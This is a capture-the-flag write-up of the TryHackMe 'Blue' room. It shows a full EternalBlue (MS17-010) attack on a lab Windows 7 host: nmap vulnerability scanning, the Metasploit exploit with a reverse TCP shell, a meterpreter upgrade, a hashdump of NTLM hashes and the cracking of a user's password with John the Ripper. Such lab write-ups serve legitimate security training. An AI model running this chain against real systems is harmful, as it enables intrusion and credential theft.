Blue · Bartosz Płóciennik

Spis treści

Deploy & hack into a Windows machine, leveraging common misconfigurations issues.

Room: https://tryhackme.com/room/blue

Requirements
#

Everything ready to use if you use Kali or THM AttackBox

RustScan / nmap
Metasploit
John the Ripper “jumbo”

Setup
#

start Windows machine
start Attackbox
log in into Attackbox, open terminal and based on THM Target Machine Information set Machine IP address export IP=10.10.59.0

Task 1: Recon
#

Based on THM question we could run scan only for ports under 1000 using --range 1-1000 or --top, but let’s run it across all ports.

rustscan -a $IP

(...)
PORT      STATE SERVICE       REASON
135/tcp   open  msrpc         syn-ack
139/tcp   open  netbios-ssn   syn-ack
445/tcp   open  microsoft-ds  syn-ack
3389/tcp  open  ms-wbt-server syn-ack
49152/tcp open  unknown       syn-ack
49153/tcp open  unknown       syn-ack
49154/tcp open  unknown       syn-ack
49158/tcp open  unknown       syn-ack
49159/tcp open  unknown       syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds

Question: How many ports are open with a port number under 1000?

Answer: Three ports are open and meets conditions: 135, 139 and 445

Based on that let’s run more detailed scanning only for the first three ports nmap -sV -sC --script vuln -oN blue_nmap -p135,139,445 $IP

-sV allows to determine software version
-sC runs default nmap scripts - helps in enumeration and vulnerability detection
-oN blue_nmap output results into file
--script vuln runs scripts helping to find known security weaknesses

(...)
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 02:A6:87:17:FF:49 (Unknown)
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
(...)

Question: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

Answer: ms17-010

Task 2: Gain Access
#

Run Metasploit using msfconsole command and let’s use the exploit we discovered.

msf6 > search ms17-010

Matching Modules
================

   #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                  .                .        .      .
   2     \_ target: Windows 7                         .                .        .      .
   3     \_ target: Windows Embedded Standard 7       .                .        .      .
   4     \_ target: Windows Server 2008 R2            .                .        .      .
   5     \_ target: Windows 8                         .                .        .      .
   6     \_ target: Windows 8.1                       .                .        .      .
   7     \_ target: Windows Server 2012               .                .        .      .
   8     \_ target: Windows 10 Pro                    .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .
   10  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   11    \_ target: Automatic                         .                .        .      .
   12    \_ target: PowerShell                        .                .        .      .
   13    \_ target: Native upload                     .                .        .      .
   14    \_ target: MOF upload                        .                .        .      .
   15    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   16    \_ AKA: ETERNALROMANCE                       .                .        .      .
   17    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   18    \_ AKA: ETERNALBLUE                          .                .        .      .
   19  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   20    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   21    \_ AKA: ETERNALROMANCE                       .                .        .      .
   22    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   23    \_ AKA: ETERNALBLUE                          .                .        .      .
   24  auxiliary/scanner/smb/smb_ms17_010             .                normal   No     MS17-010 SMB RCE Detection
   25    \_ AKA: DOUBLEPULSAR                         .                .        .      .
   26    \_ AKA: ETERNALBLUE                          .                .        .      .
   27  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
   28    \_ target: Execute payload (x64)             .                .        .      .
   29    \_ target: Neutralize implant                .                .        .      .


Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'

Let’s go with first item from the results, use exploit/windows/smb/ms17_010_eternalblue or use 0.

Question: Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

Answer: exploit/windows/smb/ms17_010_eternalblue

msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.c
                                             om/docs/using-metasploit/basics/using-metasploit.
                                             html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authenti
                                             cation. Only affects Windows Server 2008 R2, Wind
                                             ows 7, Windows Embedded Standard 7 target machine
                                             s.
   SMBPass                         no        (Optional) The password for the specified usernam
                                             e
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Targ
                                             et. Only affects Windows Server 2008 R2, Windows
                                             7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only a
                                             ffects Windows Server 2008 R2, Windows 7, Windows
                                              Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, no
                                        ne)
   LHOST     10.10.54.158     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

View the full module info with the info, or info -d command.

It looks like we only need to provide RHOSTS, which is the IP address of our target machine on which we want to run the exploit.

Question: Show options and set the one required value. What is the name of this value? (All caps for submission)

Answer: RHOSTS

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.59.0
RHOSTS => 10.10.59.0

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp

Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter: set payload windows/x64/shell/reverse_tcp

Let’s run exploit and wait for results…

I had to restart the target machine, so the IP address changed from that point to 10.10.183.48.

msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.10.54.158:4444 
[*] 10.10.183.48:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.183.48:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.183.48:445      - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.183.48:445 - The target is vulnerable.
[*] 10.10.183.48:445 - Connecting to target for exploitation.
[+] 10.10.183.48:445 - Connection established for exploitation.
[+] 10.10.183.48:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.183.48:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.183.48:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.183.48:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.183.48:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.183.48:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.183.48:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.183.48:445 - Sending all but last fragment of exploit packet
[*] 10.10.183.48:445 - Starting non-paged pool grooming
[+] 10.10.183.48:445 - Sending SMBv2 buffers
[+] 10.10.183.48:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.183.48:445 - Sending final SMBv2 buffers.
[*] 10.10.183.48:445 - Sending last fragment of exploit packet!
[*] 10.10.183.48:445 - Receiving response from exploit packet
[+] 10.10.183.48:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.183.48:445 - Sending egg to corrupted connection.
[*] 10.10.183.48:445 - Triggering free of corrupted buffer.
[*] Sending stage (336 bytes) to 10.10.183.48
[*] Command shell session 1 opened (10.10.54.158:4444 -> 10.10.183.48:49191) at 2025-04-04 16:01:52 +0100
[+] 10.10.183.48:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.183.48:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.183.48:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Shell Banner:
Microsoft Windows [Version 6.1.7601]
-----

C:\Windows\system32>

Task 3: Escalate
#

Question: If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

Answer: post/multi/manage/shell_to_meterpreter

C:\Windows\system32>^Z
Background session 1? [y/N]  y
msf6 exploit(windows/smb/ms17_010_eternalblue) >

msf6 exploit(windows/smb/ms17_010_eternalblue) > search shell_to_meterpreter

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  post/multi/manage/shell_to_meterpreter  .                normal  No     Shell to Meterpreter Upgrade
(...)

msf6 exploit(windows/smb/ms17_010_eternalblue) > use 0
msf6 post(multi/manage/shell_to_meterpreter) > options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connectio
                                       n
   LHOST                     no        IP of host that will receive the connection from the pa
                                       yload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on
(...)

Above, when we left the shell, a background session was created, so here we want to use background session 1.

msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1

msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.54.158:4433 
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 
[*] Sending stage (203846 bytes) to 10.10.183.48
[*] Meterpreter session 2 opened (10.10.54.158:4433 -> 10.10.183.48:49208) at 2025-04-04 16:13:33 +0100
[*] Stopping exploit/multi/handler

Question: Select this (use MODULE_PATH). Show options, what option are we required to change?

Answer: SESSION

We can see that meterpreter session 2 has been created.

msf6 post(multi/manage/shell_to_meterpreter) > sessions -i

Active sessions
===============

  Id  Name  Type                     Information                  Connection
  --  ----  ----                     -----------                  ----------
  1         shell x64/windows        Shell Banner: Microsoft Win  10.10.54.158:4444 -> 10.10.1
                                     dows [Version 6.1.7601] ---  83.48:49191 (10.10.183.48)
                                     --
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-P  10.10.54.158:4433 -> 10.10.1
                                     C                            83.48:49208 (10.10.183.48)

msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...

meterpreter >

let’s jump into our newly created session using sessions -i 2

Task 4: Cracking
#

Dump the non-default user’s password and crack it!

meterpreter > hashdump 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

Question: Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Answer: Jon

Copy the last line from the hashdump response and save it to a text file on our attackbox machine. In a moment we’ll use it to crack a password hash.

root@ip-10-10-54-158:~# echo "Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::" > jon_hash.txt

I believe author wanted from us to use John the Ripper so let’s go with that tool.

root@ip-10-10-54-158:~# john --format=NT jon_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
alqfna22         (Jon)
1g 0:00:00:01 DONE (2025-04-04 16:36) 0.7246g/s 7391Kp/s 7391Kc/s 7391KC/s alr1979..alpus
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.

Question: Copy this password hash to a file and research how to crack it. What is the cracked password?

Answer: alqfna22

Task 5: Find flags!
#

Find the three flags planted on this machine. These are not traditional flags, rather, they’re meant to represent key locations within the Windows system. Use the hints provided below to complete this room!

On this last task I forgot to increase the run time of my machine, so I lost progress on this step. I will share flags that I have discovered and saved previously without more details.

Question: Find the three flags planted on this machine. These are not traditional flags, rather, they’re meant to represent key locations within the Windows system. Use the hints provided below to complete this room!